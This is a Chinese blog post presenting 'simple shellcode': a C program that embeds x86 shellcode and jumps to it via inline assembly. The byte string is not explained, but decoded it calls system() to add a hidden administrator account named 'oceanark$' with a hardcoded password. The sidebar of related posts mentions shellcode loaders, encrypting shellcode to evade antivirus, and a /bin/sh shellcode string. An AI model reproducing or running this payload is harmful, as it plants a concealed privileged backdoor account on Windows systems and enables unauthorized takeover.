简单shellcode

最新推荐文章于 2023-03-06 16:56:00 发布
最新推荐文章于 2023-03-06 16:56:00 发布
阅读量346 收藏
点赞数
文章标签: shellcode 
void main()
{
 char shellcode[] = "\x54\x55\x50\x57\x56\x8b\xec\x33"
  "\xff\x57\x57\x57\xc6\x45\xf4\x6d"
  "\xc6\x45\xf5\x73\xc6\x45\xf6\x76"
  "\xc6\x45\xf7\x63\xc6\x45\xf8\x72"
  "\xc6\x45\xf9\x74\xc6\x45\xfa\x2e"
  "\xc6\x45\xfb\x64\xc6\x45\xfc\x6c"
  "\xc6\x45\xfd\x6c\x8d\x45\xf4\x50"
  "\xb8\x7b\x1d\x80\x7c\xff\xd0\x8b"
  "\xec\x33\xff\x83\xec\x24\xc6\x45"
  "\xdd\x6e\xc6\x45\xde\x65\xc6\x45"
  "\xdf\x74\xc6\x45\xe0\x20\xc6\x45"
  "\xe1\x75\xc6\x45\xe2\x73\xc6\x45"
  "\xe3\x65\xc6\x45\xe4\x72\xc6\x45"
  "\xe5\x20\xc6\x45\xe6\x6f\xc6\x45"
  "\xe7\x63\xc6\x45\xe8\x65\xc6\x45"
  "\xe9\x61\xc6\x45\xea\x6e\xc6\x45"
  "\xeb\x61\xc6\x45\xec\x72\xc6\x45"
  "\xed\x6b\xc6\x45\xee\x24\xc6\x45"
  "\xef\x20\xc6\x45\xf0\x24\xc6\x45"
  "\xf1\x77\xc6\x45\xf2\x65\xc6\x45"
  "\xf3\x69\xc6\x45\xf4\x39\xc6\x45"
  "\xf5\x33\xc6\x45\xf6\x33\xc6\x45"
  "\xf7\x32\xc6\x45\xf8\x35\xc6\x45"
  "\xf9\x33\xc6\x45\xfa\x20\xc6\x45"
  "\xfb\x2f\xc6\x45\xfc\x61\xc6\x45"
  "\xfd\x64\xc6\x45\xfe\x64\x8d\x45"
  "\xdd\x50\xb8\xc7\x93\xbf\x77\xff"
  "\xd0\x8b\xec\x33\xff\x83\xec\x3c"
  "\xc6\x45\xd3\x6e\xc6\x45\xd4\x65"
  "\xc6\x45\xd5\x74\xc6\x45\xd6\x20"
  "\xc6\x45\xd7\x6c\xc6\x45\xd8\x6f"
  "\xc6\x45\xd9\x63\xc6\x45\xda\x61"
  "\xc6\x45\xdb\x6c\xc6\x45\xdc\x67"
  "\xc6\x45\xdd\x72\xc6\x45\xde\x6f"
  "\xc6\x45\xdf\x75\xc6\x45\xe0\x70"
  "\xc6\x45\xe1\x20\xc6\x45\xe2\x61"
  "\xc6\x45\xe3\x64\xc6\x45\xe4\x6d"
  "\xc6\x45\xe5\x69\xc6\x45\xe6\x6e"
  "\xc6\x45\xe7\x69\xc6\x45\xe8\x73"
  "\xc6\x45\xe9\x74\xc6\x45\xea\x72"
  "\xc6\x45\xeb\x61\xc6\x45\xec\x74"
  "\xc6\x45\xed\x6f\xc6\x45\xee\x72"
  "\xc6\x45\xef\x73\xc6\x45\xf0\x20"
  "\xc6\x45\xf1\x6f\xc6\x45\xf2\x63"
  "\xc6\x45\xf3\x65\xc6\x45\xf4\x61"
  "\xc6\x45\xf5\x6e\xc6\x45\xf6\x61"
  "\xc6\x45\xf7\x72\xc6\x45\xf8\x6b"
  "\xc6\x45\xf9\x24\xc6\x45\xfa\x20"
  "\xc6\x45\xfb\x2f\xc6\x45\xfc\x61"
  "\xc6\x45\xfd\x64\xc6\x45\xfe\x64"
  "\x8d\x45\xd3\x50\xb8\xc7\x93\xbf"
  "\x77\xff\xd0\x5e\x5f\x58\x5d\x5c";

 __asm
 {
  lea eax,shellcode  //先把ShellCode字符串的地址传给eax。
  jmp eax  //然后跳到处执行ShellCode。直接跳过去的话,ShellCode执行完后会没有返回的地方,运行完后会报错,可以把jmp换成call。
 }

/*

科普一下:
call和jmp的区别是:
jmp是直接跳到目标地址去执行
call要先把下一个命令的地址压栈,然后才跳到目标地址执行,这样等ShellCode执行完后会返回我们压栈了的下一条指令继续执行。

这段也可以换成这样的vc代码

((void(*)(void)) &strShellCode)();
    return 0;
*/
}

oceanark
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
unicorn-decoder:使用独角兽引擎的简单shellcode解码器
05-02
#unicorn-decoder 一个简单shellcode解码器,它使用unicorn引擎作为后端来仿真shellcode文件以查找自修改代码并尝试反汇编解码器存根的结果输出。 ##用法usage: decoder.py [-h] -f FILE [-m MODE] [-i MAX_...
shellcode加载器用于加密shellcode的py小玩意
10-03
3. **加密算法**:由于描述中提到"用于加密shellcode",所以加载器可能使用了某种加密算法,如AES(高级加密标准)或简单的异或(XOR)加密,以隐藏shellcode的内容,使其难以被静态分析工具识别。 4. **反病毒绕过**...
shellcode编写
qq_39153421的博客
08-02 1067
1.前言漏洞利用最重要的就是shellcode的编写,漏洞发现者在漏洞发现之初并不会给出完整的shellcode,所以我们要学会自己编写shellcode。注:shellcode中不能出现NULL和/x00,存在其一再利用的时候会被截断。 2.什么是Shellcode shellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击...
如何写shell code
|游梦空间|
04-27 1087
我曾看到有人翻了aleph1的>,奇怪的是里面把写shellcode的部分给略掉了,我觉得对于想自己写点儿exploit的人,不懂怎么写shellcode是不行的.所以我就参考alph1的文章来讲讲怎么写shellcode.不对的地方还请多多指教.                                                   通过覆盖堆栈中的返回地址,我们可以让程序转到该地址
shellcode
DoasIsay的博客
09-15 730
写过shellcode的都写过这样的语句,unsigned char shellcode[]={};  ((void (*)())(&shellcode))(); 然而输出shellcode,&shellcode, &shellcode[0]它们的值却是一样的,但在这里为什么却只能用&shellcode? 如果将它们自身的值各自增一再输出你就会看到不同的结果,这是为什么? 现以window
ShellCode入门(提取ShellCode
05-16 515
什么是ShellCode: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcodeShellcode通常是以机器码形式编写的,所以我们要学习硬编码。 char shellcode[] = ...
shellcode简单例子
10-28
简单shellcode例子,用于学习缓冲区溢出,winnt5.0下 测试通过
MakeCode:DLL转换为Shellcode
05-19
这个工具 "MakeCode.exe" 提供了一个简单的命令行接口,允许用户指定一个DLL文件,然后程序会处理这个DLL并生成相应的Shellcode。这个过程涉及到以下几个关键步骤: 1. **DLL分析**:首先,MakeCode需要解析DLL文件...
DumpSC:DumpSC是一个简单的bash脚本,可使用objdump从二进制文件中提取Shellcode以便将来注入
04-12
总结一下,DumpSC 脚本是安全研究和逆向工程中的一个实用工具,通过结合 objdump 和 xclip,使得提取和使用二进制文件中的 Shellcode 变得简单而高效。对于想要深入理解二进制文件结构、漏洞利用和逆向分析的人员来...
Shellcode提取、加载与解析
莫慌的博客
03-06 1926
msf的shellcode 如何实现的
linux c语言shellcode,shellcode编写
weixin_36287955的博客
05-12 773
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?​ shellcode可以用于在栈溢出或者堆溢出的漏洞中用于跳转后执行的代码。本文的代码是在ubuntu 18.04 64位的linux操作系统。​ 首先是一个用于执行shellcode的c语言程序:123456char shellcode[] = "";int (int argc, char...
3.5 动态定位shellcode
qq_55202378的博客
08-02 480
自动定位API函数
3.6 shellcode编码技术
qq_55202378的博客
08-03 985
编码技术
ShellCode原理以及编写
qq_18811919的博客
07-02 2835
0x0 ShellCode编写注意事原理 1)不能使用字符串的直接偏移 即使你在C/C++代码中定义一个全局变量,一个取值为“Hello world”的字符串,或直接把该字符串作为参数传递给某个函数。但是,编译器会把字符串放置在一个特定的Section中(如.rdata或.data)。 2)不能确定函数的地址(如printf) 在shellcode中,我们却不能以逸待劳了。因为我们无法确定包含所需函数的DLL文件是否已经加载到内存。受ASLR(地址空间布局随机化)机制的影响,系统不会每次都把DLL文件加载
C语言执行shellcode的五种方法
热门推荐
云守护的专栏
05-30 1万+
//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #pragma comment
shellcode编码
浅浅徘徊的博客
02-10 3623
shellcode没有被编码,如果shellcode中存在NULL、函数名也有可能被检测到,所以有必要对shell code进行编码。 首先将shellcode编码 #!/usr/bin/env python import os s='' data = bytes(open('d:\\1.txt','rb').read(1000)) for ch in data: s+='\...
linux 生成shellcode,基本shellcode提取方法
weixin_35747051的博客
05-13 222
下面,我们用C语言内嵌汇编的方式,构造shellcode,具体代码如下。有一点要注意,Linux X86默认的字节序是little-endian,所以压栈的字符串要注意顺序。(如“/bin/bash”,其16进制表示为0x2f 0x62 0x69 0x6e 0x2f 0x62 0x61 0x73 0x68,在little-endian模式下,其表示为0x68 0x73 0x61 0x62 0x2f...
好用的shellcode
九层台
01-25 655
给师傅要了一组好用的shellcode 1.短。 2.没有空格符,换行符 好用shellcodeshellcode_x64 = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" shellcode_x86 = "\x31\xc9\xf7\xe1\x51...
golang shellcode
最新发布
06-08
下面是一个简单的例子: ```go package main import ( "syscall" "unsafe" ) func main() { shellcode := []byte{ /* your shellcode goes here */ } // Allocate memory for the shellcode addr, _, err :...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值